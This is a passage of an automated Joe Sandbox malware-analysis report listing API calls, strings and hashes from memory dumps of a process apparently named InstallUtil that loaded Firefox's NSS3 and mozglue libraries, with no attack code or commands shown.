                                                                                                                    • Part of subcall function 6C860930: EnterCriticalSection.KERNEL32(?,00000000,?,6C860C83), ref: 6C86094F
                                                                                                                    • Part of subcall function 6C860930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C860C83), ref: 6C860974
                                                                                                                    • Part of subcall function 6C860930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C860983
                                                                                                                    • Part of subcall function 6C860930: _PR_MD_UNLOCK.NSS3(?,?,6C860C83), ref: 6C86099F
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C86087D
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C860892
                                                                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C86798A), ref: 6C8608AA
                                                                                                                  • free.MOZGLUE(?,00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C8608C7
                                                                                                                  • free.MOZGLUE(?,00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C8608E9
                                                                                                                  • free.MOZGLUE(?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C8608EF
                                                                                                                  • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C867AE2,?,?,?,?,?,?,6C86798A), ref: 6C86090E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3145526462-0
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C74670B
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C742B2C), ref: 6C74675E
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C74678E
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C742B2C), ref: 6C7467E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                  • String ID: winClose$winUnmapfile1$winUnmapfile2
                                                                                                                  • API String ID: 3168844106-373099266
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6D4FC4
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6D51BB
                                                                                                                  Strings
                                                                                                                  • unable to delete/modify user-function due to active statements, xrefs: 6C6D51DF
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6D51A5
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C6D51B4
                                                                                                                  • misuse, xrefs: 6C6D51AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_logstrlen
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                  • API String ID: 3619038524-4115156624
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: __allrem
                                                                                                                  • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                  • API String ID: 2933888876-3221253098
                                                                                                                  APIs
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C79AB3E,?,?,?), ref: 6C79AC35
                                                                                                                    • Part of subcall function 6C77CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C77CF16
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C79AB3E,?,?,?), ref: 6C79AC55
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C79AB3E,?,?), ref: 6C79AC70
                                                                                                                    • Part of subcall function 6C77E300: TlsGetValue.KERNEL32 ref: 6C77E33C
                                                                                                                    • Part of subcall function 6C77E300: EnterCriticalSection.KERNEL32(?), ref: 6C77E350
                                                                                                                    • Part of subcall function 6C77E300: PR_Unlock.NSS3(?), ref: 6C77E5BC
                                                                                                                    • Part of subcall function 6C77E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C77E5CA
                                                                                                                    • Part of subcall function 6C77E300: TlsGetValue.KERNEL32 ref: 6C77E5F2
                                                                                                                    • Part of subcall function 6C77E300: EnterCriticalSection.KERNEL32(?), ref: 6C77E606
                                                                                                                    • Part of subcall function 6C77E300: PORT_Alloc_Util.NSS3(?), ref: 6C77E613
                                                                                                                  • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C79AC92
                                                                                                                  • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C79AB3E), ref: 6C79ACD7
                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C79AD10
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C79AD2B
                                                                                                                    • Part of subcall function 6C77F360: TlsGetValue.KERNEL32(00000000,?,6C79A904,?), ref: 6C77F38B
                                                                                                                    • Part of subcall function 6C77F360: EnterCriticalSection.KERNEL32(?,?,?,6C79A904,?), ref: 6C77F3A0
                                                                                                                    • Part of subcall function 6C77F360: PR_Unlock.NSS3(?,?,?,?,6C79A904,?), ref: 6C77F3D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  APIs
                                                                                                                  • PR_Now.NSS3 ref: 6C778C7C
                                                                                                                    • Part of subcall function 6C819DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DC6
                                                                                                                    • Part of subcall function 6C819DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DD1
                                                                                                                    • Part of subcall function 6C819DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C819DED
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C778CB0
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C778CD1
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C778CE5
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C778D2E
                                                                                                                  • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C778D62
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C778D93
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(6C7995DC,00000000,00000000,00000000,?,6C7995DC,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C798517
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C798585
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C79859A
                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C87D8C4,6C7995D0,?,?,?,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C7985CC
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C7985E1
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C777F4A,00000000,?), ref: 6C7985F4
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C7645B5
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C7645C9
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7645E6
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7645F8
                                                                                                                    • Part of subcall function 6C7AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7A8D2D,?,00000000,?), ref: 6C7AFB85
                                                                                                                    • Part of subcall function 6C7AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7AFBB1
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C764647
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C87A0F4,?), ref: 6C76468C
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7646A1
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C76E728,?,00000038,?,?,00000000), ref: 6C772E52
                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C772E66
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C772E7B
                                                                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C772E8F
                                                                                                                  • PL_HashTableLookup.NSS3(?,?), ref: 6C772E9E
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C772EAB
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C772F0D
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,?,6C767296,00000000), ref: 6C7A4487
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,6C767296,00000000), ref: 6C7A44A0
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,6C767296,00000000), ref: 6C7A44BB
                                                                                                                  • SECMOD_DestroyModule.NSS3(?,?,?,?,6C767296,00000000), ref: 6C7A44DA
                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,6C767296,00000000), ref: 6C7A4530
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,6C767296,00000000), ref: 6C7A453C
                                                                                                                  • PORT_FreeArena_Util.NSS3 ref: 6C7A454F
                                                                                                                    • Part of subcall function 6C78CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C76B1EE,D958E836,?,6C7A51C5), ref: 6C78CAFA
                                                                                                                    • Part of subcall function 6C78CAA0: PR_UnloadLibrary.NSS3(?,6C7A51C5), ref: 6C78CB09
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?,6C7BCD93,?), ref: 6C7BCEEE
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7BCD93,?), ref: 6C7BCEFC
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7BCD93,?), ref: 6C7BCF0B
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7BCD93,?), ref: 6C7BCF1D
                                                                                                                    • Part of subcall function 6C7AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7A8D2D,?,00000000,?), ref: 6C7AFB85
                                                                                                                    • Part of subcall function 6C7AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7AFBB1
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF47
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF67
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,00000000,6C7BCD93,?,?,?,?,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF78
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4291907967-0
                                                                                                                  • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                  • Instruction ID: a38f3f1f72d81876bc52da552ceef918a8d48de9873b949711c936bd3b347160
                                                                                                                  • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                  • Instruction Fuzzy Hash: 7811A5A6E002045BE700AE666E49B6BB5EC9F5454EF048139FC19E7741FB70D908C6B1
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C768C1B
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C768C34
                                                                                                                  • PL_ArenaAllocate.NSS3 ref: 6C768C65
                                                                                                                  • PR_Unlock.NSS3 ref: 6C768C9C
                                                                                                                  • PR_Unlock.NSS3 ref: 6C768CB6
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                  • String ID: KRAM
                                                                                                                  • API String ID: 4127063985-3815160215
                                                                                                                  • Opcode ID: edcef2a5144e37ed94c356a66df5840db6be059b9c8be0dec7c2b3563821f808
                                                                                                                  • Instruction ID: 8d596a2c018d89058193bde753528e0e39ef23341c0bc4cd7895d6fe53002cdd
                                                                                                                  • Opcode Fuzzy Hash: edcef2a5144e37ed94c356a66df5840db6be059b9c8be0dec7c2b3563821f808
                                                                                                                  • Instruction Fuzzy Hash: 7E2130B16056018FD700AF79C588559BBF4FF56308F0589BADC88CBB11EB35D886CB92
                                                                                                                  APIs
                                                                                                                  • PK11_GetInternalKeySlot.NSS3(?,?,?,6C792E62,?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C), ref: 6C778EA2
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C79F854
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C79F868
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C79F882
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(04C483FF,?,?), ref: 6C79F889
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C79F8A4
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C79F8AB
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C79F8C9
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(280F10EC,?,?), ref: 6C79F8D0
                                                                                                                  • PK11_IsLoggedIn.NSS3(?,?,?,6C792E62,?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C), ref: 6C778EC3
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C792E62,?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C), ref: 6C778EDC
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C792E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C778EF1
                                                                                                                  • PR_Unlock.NSS3 ref: 6C778F20
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                  • String ID: b.yl
                                                                                                                  • API String ID: 1978757487-943809714
                                                                                                                  • Opcode ID: a4ca42e3b2594609cc20454f5898f88a67d75ac8b3a5b392d9356e0222b76851
                                                                                                                  • Instruction ID: 545786e3d416de1d3093b670022b67663d19cb54f2c5814767692403edbd9f33
                                                                                                                  • Opcode Fuzzy Hash: a4ca42e3b2594609cc20454f5898f88a67d75ac8b3a5b392d9356e0222b76851
                                                                                                                  • Instruction Fuzzy Hash: FA21A0709096099FCB10AF29D688599BBF4FF49318F01456EEC989BB41D730E854CBE2
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,6C7561C4,?,6C755639,00000000), ref: 6C7A8991
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C755639,00000000), ref: 6C7A89AD
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C755639,00000000), ref: 6C7A89C6
                                                                                                                  • PR_WaitCondVar.NSS3 ref: 6C7A89F7
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C755639,00000000), ref: 6C7A8A0C
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                  • String ID: 9Vul
                                                                                                                  • API String ID: 2759447159-3524958965
                                                                                                                  • Opcode ID: ec9fb2556207df9fd8421f7243f96e237cc8f11b630a1843398c5bedd74af747
                                                                                                                  • Instruction ID: 8bf497ebb49210be7b7782677ac952cb0408dad52c2ac2e590ec8f39390fec34
                                                                                                                  • Opcode Fuzzy Hash: ec9fb2556207df9fd8421f7243f96e237cc8f11b630a1843398c5bedd74af747
                                                                                                                  • Instruction Fuzzy Hash: 07216DB49047458FDB11AFB8C6882A9BBF4FF06358F114676DC989B601E730D896CBD2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7FA390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7FA415
                                                                                                                  • PK11_ExtractKeyValue.NSS3(00000000), ref: 6C7FA5AC
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C7FA5BF
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C7FA5C8
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                    • Part of subcall function 6C79ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                    • Part of subcall function 6C79ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                    • Part of subcall function 6C79ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C7FA5D9
                                                                                                                  • PR_SetError.NSS3(FFFFD04C,00000000), ref: 6C7FA5E8
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
                                                                                                                  • String ID: *@
                                                                                                                  • API String ID: 2660593509-1483644743
                                                                                                                  • Opcode ID: 394995ed3c0cc6c170694d3b35e41cb52fa78ab5b4dd5cd60935b080211310db
                                                                                                                  • Instruction ID: 17e26155f9995dc0911a9d535d046d572e964f79886f35d92801e9541843fe60
                                                                                                                  • Opcode Fuzzy Hash: 394995ed3c0cc6c170694d3b35e41cb52fa78ab5b4dd5cd60935b080211310db
                                                                                                                  • Instruction Fuzzy Hash: 1F2127B1C043049BC7019F29EE4569FBBF4AF9972CF054228EC6823740E770E6598BD2
                                                                                                                  APIs
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C862CA0
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C862CBE
                                                                                                                  • calloc.MOZGLUE(00000001,00000014), ref: 6C862CD1
                                                                                                                  • strdup.MOZGLUE(?), ref: 6C862CE1
                                                                                                                  • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C862D27
                                                                                                                  Strings
                                                                                                                  • Loaded library %s (static lib), xrefs: 6C862D22
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                  • String ID: Loaded library %s (static lib)
                                                                                                                  • API String ID: 3511436785-2186981405
                                                                                                                  • Opcode ID: b23bd490d67bbc74ced8691c39ca292c163e879cb552bcb3927328fbc8bff1d8
                                                                                                                  • Instruction ID: 24f050f795471f09db57eaa8ecbf435faebfbd7aab937fb26c76c9a718e50741
                                                                                                                  • Opcode Fuzzy Hash: b23bd490d67bbc74ced8691c39ca292c163e879cb552bcb3927328fbc8bff1d8
                                                                                                                  • Instruction Fuzzy Hash: 311138B17002059FEB309F1AD908A6637B5AB4634DF04897DD809CBF41D735E808CBD1
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7568FB
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C756913
                                                                                                                  • PORT_FreeArena_Util.NSS3 ref: 6C75693E
                                                                                                                  • PR_Unlock.NSS3 ref: 6C756946
                                                                                                                  • DeleteCriticalSection.KERNEL32 ref: 6C756951
                                                                                                                  • free.MOZGLUE ref: 6C75695D
                                                                                                                  • PR_Unlock.NSS3 ref: 6C756968
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
